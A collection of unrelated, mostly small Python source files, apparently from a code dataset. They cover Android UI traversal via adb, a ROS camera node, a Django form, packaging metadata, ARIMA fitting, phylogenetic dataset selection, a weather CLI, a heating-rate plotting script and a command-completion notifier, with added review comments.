                    self.travelCurrentView(sanView)
        mView.showView()
        self.backKey()

    def backKey(self):
        # Send hardware BACK to return to the father view.
        logging.info( '--------> back to father view')
        adbExtend().call_adb('shell input keyevent KEYCODE_BACK')

    def enterSan(self, sunNode):
        # mpth = sunNode.getPath()
        # Tap the centre of the widget and give the UI a second to settle.
        logging.info( 'Enter san--------')
        xcenter = sunNode.getXcenter()
        ycenter = sunNode.getYcenter()
        adbExtend().touchEvent(xcenter, ycenter)
        time.sleep(1)

    # NOTE: a commented-out prototype (startTraversalFolder) that traversed a
    # directory tree with the same View/Node machinery was removed here; see
    # version control history if it is ever needed again.
if __name__ == '__main__':
    beforeTime = time.time()
    # Prepare the per-app performance monitor for the foreground package.
    activityName = adbExtend().getCurrentActivityN()
    packageName = activityName.split('/')[0]
    devicePerf = AppPerformanceInfo(packageName)
    # Fixed: the original instantiated the undefined name `BugDetach()`;
    # the class imported at the top of the file is BugDetect.
    bugDetect = BugDetect()
    # Monitor and detection threads; daemonised so they die with the main
    # traversal thread.
    threads = []
    t1 = threading.Thread(target=devicePerf.getResourceInfo)
    threads.append(t1)
    t2 = threading.Thread(target=devicePerf.get_activityLuanchTime)
    threads.append(t2)
    # bug detection threads
    t3 = threading.Thread(target=bugDetect.logcatGet)
    threads.append(t3)
    t4 = threading.Thread(target=bugDetect.updateAndDetach)
    threads.append(t4)
    # start device monitor threads
    for t in threads:
        t.setDaemon(True)
        t.start()
    # Drive the UI traversal (includes the final monkey pass).
    mViewTravs = viewTraversal(maxLevel=3)
    mViewTravs.startTravelView()
    # stop device monitor and bug detection
    devicePerf.setRunningFlag(False)
    bugDetect.setRunningFlag(False)
    logging.info('----------- show some result ----------------')
    devicePerf.showLaunchInfo()
    devicePerf.showKPIInfo()
    afterTime = time.time()
    # Fixed: time.strftime() was a no-op here (all % placeholders were already
    # consumed by the string formatting); log the elapsed time directly.
    logging.info('Execute Time: %d s' % (afterTime - beforeTime))
|
#!/usr/bin/env python
'''
**********************************************************************
* Filename : camIncoming.py
* Description : receives the message for an image and processes it.
* Author : Joe Kocsis
* E-mail : Joe.Kocsis3@gmail.com
* Website : www.github.com/jkocsis3/tanis
**********************************************************************
'''
import rospy
from sensor_msgs.msg import Image
from cv_bridge import CvBridge, CvBridgeError
import cv2
import os
class CamIncoming():
    """ROS node that subscribes to the main camera capture topic and writes
    each received frame to disk as a numbered .jpg."""
    _DEBUG = True
    _DEBUG_INFO = 'DEBUG "camIncoming.py":'

    def __init__(self, debug=False):
        self._DEBUG = debug
        rospy.loginfo(self._DEBUG_INFO + "Initiating Node")
        # Fixed: ROS graph resource names may not contain spaces; the
        # original "cam incoming node" is invalid and rejected by init_node.
        rospy.init_node("cam_incoming_node")
        self.bridge = CvBridge()
        # Monotonic counter used to name the saved images.
        self.counter = 0
        self.image_msg = rospy.Subscriber("/angela/cameras/main/capture", Image, self.SaveImage)
        # stops the node from exiting
        rospy.spin()

    def SaveImage(self, data):
        """Subscriber callback: convert the ROS Image to OpenCV and save it.

        Returns early (after logging) when the cv_bridge conversion fails.
        """
        if self._DEBUG:
            rospy.loginfo(self._DEBUG_INFO + "Saving Image")
        try:
            cv_image = self.bridge.imgmsg_to_cv2(data, desired_encoding="rgb8")
        except CvBridgeError as e:
            rospy.logerr(self._DEBUG_INFO)
            rospy.logerr(e)
            return
        savePath = os.path.join('/home/pi/tanis/Images/', (str(self.counter) + '.jpg'))
        cv2.imwrite(savePath, cv_image)
        if self._DEBUG:
            rospy.loginfo(self._DEBUG_INFO + "Image Saved")
        self.counter += 1
if __name__ == '__main__':
CamIncoming()
|
from .models import StuData
from django import forms
class StuForm(forms.ModelForm):
    """ModelForm for StuData that rejects empty values in every field."""

    class Meta:
        model = StuData
        fields = ["name", "score", "type"]

    def clean(self, *args, **kwargs):
        """Validate that none of the declared fields is empty or missing.

        Fixes over the original: the `return False` and `break` after the
        raise were unreachable dead code; super().clean() was skipped on the
        error path; and the message said "Name Cannot be empty" regardless
        of which field was actually empty.
        """
        cleaned = super().clean(*args, **kwargs)
        for field in ("name", "score", "type"):
            value = cleaned.get(field)
            if value in (None, ''):
                raise forms.ValidationError("%s cannot be empty" % field)
        return cleaned
|
from distutils.core import setup

# Packaging metadata for the easygl library.
setup(
    name='easygl',
    version='0.1.0a1',
    packages=['easygl', 'easygl.arrays', 'easygl.display', 'easygl.prefabs', 'easygl.shaders', 'easygl.textures',
              'easygl.structures'],
    url='https://github.com/overdev/easygl-0.1.0-alpha1',
    license='MIT',
    classifiers=[
        'Development Status :: 3 - Alpha',
        'Intended Audience :: Developers',
        'License :: OSI Approved :: MIT License',
        # Fixed typo: 'Programmin Language :: ...' is not a valid Trove
        # classifier and is rejected on package upload.
        'Programming Language :: Python :: 3.4',
    ],
    # NOTE(review): pygame/PyOpenGL/typing look like *runtime* requirements;
    # under setuptools these belong in install_requires, and plain distutils
    # ignores setup_requires entirely -- confirm the intended build backend.
    setup_requires=['pygame', 'PyOpenGL', 'typing'],
    keywords='games easygl opengl gl graphics textures geometry rendering gamedev pygame PyOpenGL',
    author='Jorge A. G.',
    author_email='jorgegomes83@hotmail.com',
    description='A small library for easy OpenGL 2D rendering.'
)
|
import numpy as np
from rpy2.robjects import numpy2ri
numpy2ri.activate()
from rpy2.robjects.packages import importr
stats = importr('stats')
# x : np.ndarray
# ar_order : int
# ma_order : int
# diff_order : int
# -> (np.ndarray, np.ndarray, float, int)
def arima_r(x, ar_order, ma_order, diff_order):
    """Fit an ARIMA(ar_order, diff_order, ma_order) model to `x` via R's
    stats::arima (maximum likelihood).

    Returns a tuple (coefficients, residuals, aic, nobs) where the first two
    are numpy arrays and the last two are scalars.
    """
    order = np.array([ar_order, diff_order, ma_order])
    fit = stats.arima(x, order=order, method='ML')
    coefficients = np.array(fit.rx2('coef'))
    residuals = np.array(fit.rx2('residuals'))
    aic = np.array(fit.rx2('aic'))[0]
    nobs = np.array(fit.rx2('nobs'))[0]
    return coefficients, residuals, aic, nobs
|
import sys
import os
import shutil
import random
import glob
sys.path.insert(0, 'scripts')
sys.path.insert(0, 'tools/families')
sys.path.insert(0, 'tools/database')
import experiments as exp
import fam
from find_diff_datasets_julia import get_diff_and_propmax
def get_ali_from_logs(logfile):
    """Extract the alignment file path from a RAxML-NG log file.

    Scans for the line "Reading alignment from file: <path>" and returns
    <path> stripped of whitespace; returns None when no such line exists.
    """
    # Fixed: `with` closes the handle (the original leaked it) and iterating
    # the file lazily avoids loading the whole log into memory.
    with open(logfile) as reader:
        for line in reader:
            if ("Reading alignment from file" in line):
                return line.split(":")[-1].strip()
    return None
def get_nt_from_logs(logfile):
    """Return taxa * sites parsed from a RAxML-NG log, or 0 when absent.

    Expects a line of the form
    "[hh:mm:ss] Loaded alignment with <taxa> taxa and <sites> sites",
    where whitespace tokens 4 and 7 hold the two counts.
    """
    # Fixed: `with` closes the handle (the original leaked it).
    with open(logfile) as reader:
        for line in reader:
            if ("Loaded alignment with" in line):
                sp = line.split()
                print(sp[4] + " " + sp[7])
                return int(sp[4]) * int(sp[7])
    return 0
def generate(inputdir, prefix, min_var, max_propmax, max_fam, max_nt, seed):
    """Select gene families from `inputdir` by tree-difference criteria and
    copy them into a freshly initialised dataset directory.

    A family is kept when its variance is >= min_var, its propmax is
    <= max_propmax, and its alignment has at most max_nt cells; at most
    max_fam families are taken (max_fam <= 0 means no limit).  `seed` fixes
    the shuffle order so runs are reproducible.
    """
    random.seed(seed)
    # Encode every selection parameter into the output directory name.
    outputdir = "diff" + prefix
    outputdir += "_var" + str(min_var)
    outputdir += "_propmax" + str(max_propmax)
    if (max_fam > 0):
        outputdir += "_fam" + str(max_fam)
    outputdir += "_nt" + str(max_nt)
    outputdir += "_seed" + str(seed)
    outputdir = fam.get_datadir(outputdir)
    fam.init_top_directories(outputdir)
    all_families = os.listdir(inputdir)
    # Sort before shuffling so the seeded shuffle is deterministic across
    # filesystems (os.listdir order is arbitrary).
    all_families.sort()
    random.shuffle(all_families)
    print("Total number of families " + str(len(all_families)))
    families = []
    index = 0
    for family in all_families:
        index += 1
        famdir = os.path.join(inputdir, family)
        # Skip families without the expected database file.
        if (not os.path.isfile(os.path.join(famdir, "data.sqlite3"))):
            continue
        raxmldir = os.path.join(inputdir, family, "output_files", "raxmlng", "evaluation")
        pat = os.path.join(raxmldir, "*raxml.log")
        print(pat)
        anylog = None
        try:
            anylog = glob.glob(pat)[0]
        except:
            # No raxml log present: this family cannot be evaluated.
            continue
        bases = get_nt_from_logs(anylog)
        print(bases)
        if (bases > max_nt):
            continue
        t = None
        try:
            t = get_diff_and_propmax(famdir)
        except:
            continue
        print(t)
        var = t[0]
        propmax = t[1]
        if (var >= min_var and propmax <= max_propmax):
            families.append(family)
            print("*********************")
            print("Add " + family + " " + str(len(families)))
            print(" after " + str(index) + " iterations")
            if (max_fam > 0 and len(families) >= max_fam):
                break
    # Materialise each selected family: copy the alignment and concatenate
    # all bootstrap trees into the multiple-trees file.
    for family in families:
        fam.init_family_directories(outputdir, family)
        raxmldir = os.path.join(inputdir, family, "output_files", "raxmlng", "evaluation")
        pat = os.path.join(raxmldir, "*raxml.log")
        anylog = glob.glob(pat)[0]
        ali = get_ali_from_logs(anylog)
        shutil.copy(ali, fam.get_alignment(outputdir, family))
        trees = glob.glob(os.path.join(raxmldir, "*.bestTree"))
        print(len(trees))
        with open(fam.get_raxml_multiple_trees(outputdir, "GTR+G", family, 100), "w") as writer:
            for tree in trees:
                writer.write(open(tree).read())
    #fam.postprocess_datadir(outputdir)
if (__name__ == "__main__"):
    # Seven positional arguments are required, so argv must hold at least 8
    # entries (argv[0] is the script path).  Fixed: the original tested
    # `< 7` and then crashed with IndexError on sys.argv[7] when exactly six
    # arguments were supplied.
    if (len(sys.argv) < 8):
        print("Syntax: python " + os.path.basename(__file__) + " inputdir prefix min_var max_propmax max_families max_bases seed")
        exit(1)
    inputdir = sys.argv[1]
    prefix = sys.argv[2]
    min_var = float(sys.argv[3])
    max_propmax = float(sys.argv[4])
    max_fam = int(sys.argv[5])
    max_nt = int(sys.argv[6])
    seed = int(sys.argv[7])
    generate(inputdir, prefix, min_var, max_propmax, max_fam, max_nt, seed)
|
#!/usr/bin/env python
import weather
from geopy.geocoders import Nominatim
import sys, getopt
import mytime
# User should be able to type:
# weather [weather for current date/location]
# weather on [date]
# weather in [location]
# weather [tomorrow]
# weather on [date] in [location]
# weather in [location] on [date]
def main(argv):
    # Parse the free-form command line and print a forecast report.
    # Supported shapes: "weather", "weather tomorrow", "weather on <date>",
    # "weather in <place>", "weather tomorrow in <place>",
    # "weather on <date> in <place>", "weather in <place> on <date>".
    # -V suppresses the header banner.
    try:
        opts, args = getopt.getopt(argv, "hV")
    except getopt.GetoptError:
        print "weather [-l location] [-d date]"
        sys.exit(2)
    # parse out the command line options
    report = ""
    verbose = 1
    if len(args) == 0:
        #print "Current date/location"
        weather_time = mytime.now()
        report = weather.digest(weather.local_conditions(weather_time))
    elif len(args) == 1 and args[0] == "tomorrow":
        weather_time = mytime.tomorrow()
        report = weather.digest(weather.local_conditions(weather_time))
    elif len(args) == 2 and args[0] == "on":
        # "weather on <date>" at the current location
        weather_time = mytime.datetime_from_string(args[1], 1)
        report = weather.digest(weather.local_conditions(weather_time))
    elif len(args) == 2 and args[0] == "in":
        # "weather in <place>" right now; geocode the place name
        geolocator = Nominatim()
        location = geolocator.geocode(args[1])
        weather_time = mytime.now()
        report = weather.digest(weather.conditions(location.latitude, location.longitude, weather_time))
        weather_location = location.address
    elif len(args) == 3 and args[0] == "tomorrow":
        # "weather tomorrow in <place>"
        weather_time = mytime.tomorrow()
        geolocator = Nominatim()
        location = geolocator.geocode(args[2])
        report = weather.digest(weather.conditions(location.latitude, location.longitude, weather_time))
        weather_location = location.address
        print "Specific date (tomorrow)/specific location"
    elif len(args) == 4:
        if (args[0] == "on"):
            # "weather on <date> in <place>"
            weather_time = mytime.datetime_from_string(args[1], 1)
            geolocator = Nominatim()
            location = geolocator.geocode(args[3])
            report = weather.digest(weather.conditions(location.latitude, location.longitude, weather_time))
            weather_location = location.address
        elif (args[0] == "in"):
            # Start with location
            # "weather in <place> on <date>"
            weather_time = mytime.datetime_from_string(args[3], 3)
            geolocator = Nominatim()
            location = geolocator.geocode(args[1])
            report = weather.digest(weather.conditions(location.latitude, location.longitude, weather_time))
            weather_location = location.address
        else:
            # NOTE(review): on the error paths weather_time is never assigned,
            # so the dt_format() call below raises NameError -- consider
            # sys.exit() here instead of falling through.
            print "Error!"
    else:
        print "Error!"
    for opt, arg in opts:
        if opt == '-V':
            # -V silences the header output; only the raw report is printed.
            verbose = 0
    if verbose == 1:
        try:
            location_header = "Weather for " + weather_location
        except:
            # weather_location is only bound on explicit-location paths.
            location_header = "Weather for current location"
        print location_header
        print mytime.dt_format(weather_time, 'header')
        print "=" * len(location_header)
        print report
    #print weather.digest(weather.local_conditions(mytime.tomorrow()))
#print weather.digest(weather.local_conditions(mytime.tomorrow()))
if __name__ == "__main__":
main(sys.argv[1:])
|
import numpy as np
from netCDF4 import Dataset, num2date # to work with NetCDF files
from os.path import expanduser
import matplotlib.pyplot as plt
home = expanduser("~") # Get users home directory
import statsmodels.api as sm
from scipy import stats
import xarray as xr
import pytz
import glob, os
import numpy as np
import matplotlib
import matplotlib.pyplot as plt
import matplotlib.dates as mdates
import datetime
from dateutil import tz
import metpy.calc as mpcalc
from metpy.units import units
import pandas as pd
import seaborn as sns
import matplotlib.ticker as ticker
import matplotlib.colors as colors
import matplotlib.cm as cmx
matplotlib.rcParams.update({'font.size': 24})
#Directory where sondes are stored
#dir_profile = "/media/ludo/DATA/google-drive/Thèse/EUREC4a/github/Input/Products/"
#path_to_sonde_profiles = os.path.join(dir_profile,"rad_profiles_all_sondes_ERA.nc")
dir_profile = "../output/rad_profiles"
path_to_sonde_profiles = os.path.join(dir_profile,"rad_profiles.nc")
sonde_profiles = xr.open_dataset(path_to_sonde_profiles)
def get_variables_to_plot(profiles):
    """Bin per-sonde radiative heating profiles onto a local-time x altitude
    grid (10-minute bins over one composite day) for pcolormesh plotting.

    Returns (time, zlay, q_rad, q_rad_lw, q_rad_sw) where the q_* arrays are
    transposed to shape (len(zlay), len(time)); bins with no sonde stay 0.
    """
    #get only some coordinates of the original xarray
    data = profiles["q_rad"]
    data["q_rad_lw"] = profiles["q_rad_lw"]
    data["q_rad_sw"] = profiles["q_rad_sw"]
    data["time"] = profiles["launch_time"]
    data = data.drop_vars(["lay","col"])
    data = data.to_dataframe()
    # Convert launch times (UTC) to Barbados local and keep only HH:MM so all
    # days collapse onto a single diurnal cycle.
    data["time"] = data["time"].dt.tz_localize(pytz.UTC).dt.tz_convert('America/Barbados').dt.strftime("%H:%M")
    data["time"] = pd.to_datetime(data["time"], format="%H:%M")
    data = data.reset_index()
    data = data.set_index(["time","zlay"])
    # Average all sondes falling in the same 10-minute / altitude bin.
    data = data.groupby([pd.Grouper(freq='10min', level='time'),
                         pd.Grouper(level='zlay')]).mean()
    #come back to xarray and get q_rad
    data = data.to_xarray()
    time = data.time.values
    zlay = data.zlay.values
    #fill values with 0 in a new array
    # Build a complete 24 h grid (pandas' dummy epoch 1900-01-01, matching
    # the HH:MM parse above) so empty bins exist and remain zero.
    ini = np.datetime64('1900-01-01 00:00:00')
    end = ini + np.timedelta64(24,'h')
    count_time = np.arange(ini, end, np.timedelta64(10, 'm'))
    q_rad = np.zeros((len(count_time), len(zlay)))
    q_rad_sw = np.zeros((len(count_time), len(zlay)))
    q_rad_lw = np.zeros((len(count_time), len(zlay)))
    ds = xr.Dataset({'q_rad': (['count_time', 'zlay'], q_rad),
                     'q_rad_sw': (['count_time', 'zlay'], q_rad_sw),
                     'q_rad_lw': (['count_time', 'zlay'], q_rad_lw)},
                    coords={"count_time": count_time, "zlay": zlay})
    array = ds.to_dataframe()
    # Copy the binned means into the full grid cell by cell.
    for itime in time:
        for izlay in zlay:
            array.q_rad.loc[itime, izlay] = data["q_rad"].sel(time=itime).sel(zlay=izlay).values
            array.q_rad_lw.loc[itime, izlay] = data["q_rad_lw"].sel(time=itime).sel(zlay=izlay).values
            array.q_rad_sw.loc[itime, izlay] = data["q_rad_sw"].sel(time=itime).sel(zlay=izlay).values
    data = array.to_xarray()
    # Transpose to (altitude, time) as expected by pcolormesh.
    q_rad = np.transpose(data.q_rad.values)
    q_rad_lw = np.transpose(data.q_rad_lw.values)
    q_rad_sw = np.transpose(data.q_rad_sw.values)
    zlay = data.zlay.values
    time = data.count_time.values
    return time, zlay, q_rad, q_rad_lw, q_rad_sw
def plot_diurnal_cycle(profiles):
    """Plot the diurnal composite of SW / LW / net heating rates.

    Produces a 1x3 panel of time-vs-altitude pcolormesh plots (local time on
    the x axis, altitude in km on the y axis) and saves it to
    ``../Figures/Fig4_Diurnal_composite.jpg``.

    Parameters
    ----------
    profiles : xarray.Dataset
        Sonde profiles; forwarded to :func:`get_variables_to_plot`.
    """
    time, zlay, q_rad, q_rad_lw, q_rad_sw = get_variables_to_plot(profiles)
    dates_list = [date for date in time]
    fig, ax = plt.subplots(1,3,figsize=(20,10))
    ax[0].set_title(r'Shortwave')
    ax[0].set_ylabel('Altitude (km)')
    ax[1].set_title('Longwave')
    ax[1].set_xlabel('Time (Local)')
    ax[2].set_title(r'Net')
    ymin=0
    ymax=10
    # NOTE(review): matplotlib.cm.get_cmap is deprecated in Matplotlib >= 3.7
    # (use matplotlib.colormaps["RdBu_r"]); kept for compatibility here.
    colormap = matplotlib.cm.get_cmap("RdBu_r")
    # Shared color scale (K/day) so the three panels are comparable.
    val_min = -4
    val_max = 4
    # Convert altitude from m to km for the axis.
    zlay=zlay/1000
    ax[0].pcolormesh(dates_list, zlay, q_rad_sw, cmap=colormap,vmin=val_min, vmax=val_max)
    ax[1].pcolormesh(dates_list, zlay, q_rad_lw, cmap=colormap,vmin=val_min,vmax=val_max)
    im = ax[2].pcolormesh(dates_list, zlay, q_rad, cmap=colormap,vmin=val_min, vmax=val_max)
    # NOTE(review): '%-H' (no zero padding) is a glibc strftime extension and
    # fails on Windows — confirm the target platform.
    myFmt = mdates.DateFormatter('%-H')
    for k in range(3):
        ax[k].xaxis.set_major_formatter(myFmt)
        ax[k].set_ylim([0,ymax])
    # Reduce each panel to 4 evenly spaced time ticks.  The
    # date2num(num2date(...)) round-trip on the last tick is a no-op kept
    # for byte-identical behavior.
    for k in range(3):
        ticks = ax[k].get_xticks()
        ax[k].set_xticks(np.linspace(ticks[0], mdates.date2num(mdates.num2date(ticks[-1])), 4))
    # Only the leftmost panel keeps altitude labels.
    ax[1].tick_params(labelleft=False)
    ax[2].tick_params(labelleft=False)
    cb = fig.colorbar(im, ax=ax[2], extend="both")
    cb.ax.set_ylabel('Heating Rate (K/day)')
    fig.savefig('../Figures/Fig4_Diurnal_composite.jpg')
plot_diurnal_cycle(sonde_profiles)
|
#!/usr/bin/python
"""
notifyMe: allows the user to execute a program
and when it ends show up a dialog with a title and message
in order to notify that it is ended.
"""
__author__ = "Alessandro Pischedda"
__email__ = "alessandro.pischedda@gmail.com"
import sys
from subprocess import call
def setup_pynotify():
    """Initialise the pynotify (libnotify) backend.

    Returns a ``notifier(title, message)`` callable that pops up a desktop
    notification.  Exits the process if the notification daemon cannot be
    initialised.
    """
    if not pynotify.init("NotifyMe"):
        sys.exit(1)

    def notifier(title, message):
        # Bug fix: the previous version ignored its parameters and read the
        # module-level globals opts['title'] / msg instead, so the callback
        # only worked when called from __main__ with those exact globals.
        n = pynotify.Notification(title, message)
        n.show()

    return notifier
def setup_gntp():
    """Build a Growl-based notifier using gntp's `mini` helper.

    Returns a ``notifier(title, message)`` callable matching the pynotify
    backend's interface.
    """
    def notifier(_title, message):
        # Render both fields as unicode before handing them to Growl.
        rendered_title = u"{0}".format(_title)
        rendered_body = u"{0}".format(message)
        gntp.notifier.mini(
            title=rendered_title,
            description=rendered_body,
            applicationName=u"NotifyMe"
        )
    return notifier
# Backend selection happens at import time: prefer pynotify (libnotify),
# fall back to Growl notifications via gntp, and abort if neither is
# installed.  NOTE(review): the bare print statements mean this script
# targets Python 2 only.
try:
    import pynotify
    notifier = setup_pynotify()
except ImportError:
    print "Library pynotify missing"
    print "trying to import gntp (Growl Notifications)"
    try:
        import gntp.notifier
        notifier = setup_gntp()
    except ImportError:
        print "Unable to import gntp, exiting"
        sys.exit(-1)
# argparse ships with Python >= 2.7; older interpreters need the backport.
try:
    from argparse import ArgumentParser, RawDescriptionHelpFormatter
except ImportError:
    print "Library argparse missing"
    sys.exit(-1)
def options():
    """Parse the command line and return the options as a dict.

    Returns a dict with keys ``title``, ``message``, ``timeit`` and
    ``command``.  Calls ``parser.error()`` (which exits with a usage
    message) when the mandatory ``-e`` option is missing.
    """
    # set the option and help
    epilog = '''\
Note:
Every options need an argument between the \"\" if the argument is
composed by more than 1 word.
EXAMPLE if the title is Super Urgent Data you need to type :
python notifyMe.py -t \"Super Urgent Data\" -e \"ls -l\".
This is necessary even for the -e and -m options, if the argument
is composed by just one element you can ignore the \"\".
Mandatory Options:
The option -e is mandatory.'''
    # the RawDescriptionHelpFormatter is used to show the epilog as-is.
    parser = ArgumentParser(epilog=epilog, formatter_class=RawDescriptionHelpFormatter)
    # Bug fix: the ArgumentParser(version=...) keyword was deprecated in
    # argparse and removed in Python 3 (TypeError); the supported way is the
    # dedicated 'version' action.
    parser.add_argument("--version", action="version", version="%(prog)s 0.9")
    parser.add_argument("-t", "--title",
                        default="",
                        metavar="\"TITLE\"",
                        dest="title",
                        help="specify the title in the notification bar, "
                             "by default the title will be empty")
    parser.add_argument("-m", "--message",
                        metavar="\"MESSAGE\"",
                        dest="message", default="Terminated",
                        help="specify the message to be showed in the notification bar "
                             "by default is \"Terminated\"")
    parser.add_argument("-T", "--timeit", dest="timeit", action="store_true",
                        help="time the command to be executed")
    parser.add_argument("-e", "--execute", dest="command",
                        metavar="\"COMMAND\"",
                        help="the command to be executed, "
                             "remember to type the options for the command."
                             " This option is mandatory.")
    args = parser.parse_args()
    # make options as a dictionary so callers can index by option name
    opts = args.__dict__
    if opts['command'] is None:
        parser.error("Missing the option -e, it is mandatory.")
    return opts
if __name__ == "__main__":
    opts = options()
    # Bug fix: -T is a store_true flag, so its default is False, never None;
    # the old test `opts['timeit'] is not None` was always true and the
    # timing branch ran unconditionally.
    if opts['timeit']:
        import timeit
        # Time a single run of the command via timeit's statement machinery.
        cmd = opts['command']
        fun = "call('%s', shell=True)" % cmd
        setup = "from subprocess import call"
        avg = timeit.timeit(stmt=fun, setup=setup, number=1)
        msg = "%s\ntime: %s" % (opts['message'], avg)
    else:
        # execute the command and wait until it is finished
        # NOTE(review): shell=True with a user-supplied string is inherent to
        # this tool's purpose, but be aware it executes arbitrary shell code.
        call(opts['command'], shell=True)
        msg = opts['message']
    notifier(opts['title'], msg)
|
IMAGE_SIZE = 128
|
from collections import Counter

# First line: declared element count (consumed but not otherwise needed,
# since split() already yields all elements).
a = int(input())
n = list(map(int, input().split()))
# Bug fix (performance): calling n.count(x) inside the loop made the scan
# O(n^2); a Counter builds the frequency table once in O(n).
freq = Counter(n)
for x in n:
    if freq[x] == 1:
        # Print the first value (in input order) that occurs exactly once.
        print(x)
        break
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.